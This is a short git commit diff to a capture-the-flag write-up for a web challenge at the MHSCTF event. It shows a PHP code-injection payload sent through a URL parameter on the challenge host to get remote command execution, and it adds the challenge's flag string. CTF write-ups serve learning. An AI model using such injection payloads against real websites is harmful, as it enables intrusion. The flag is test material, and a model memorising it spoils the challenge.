update MHSCTF Feb 9

pull/1/head
Muhammad Daffa 2023-02-22 21:07:45 +07:00 committed by GitHub
parent 09b68b49bc
commit 2be603b410
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions

View File

@ -19,8 +19,8 @@ So, we can doing RCE (Remote Code Execution) by submitting PHP syntax like this
```
https://music-mhsctf.0xmmalik.repl.co/send.php?message=<?php system("ls"); ?>
```
And we will got the flag by checking the index file
And we will got the flag by checking someone's file :D
```
NO FLAG BECAUSE THE WEBSITE IS DOWN
```
valentine{n3ver_g0nn4_give_y0u_up}
```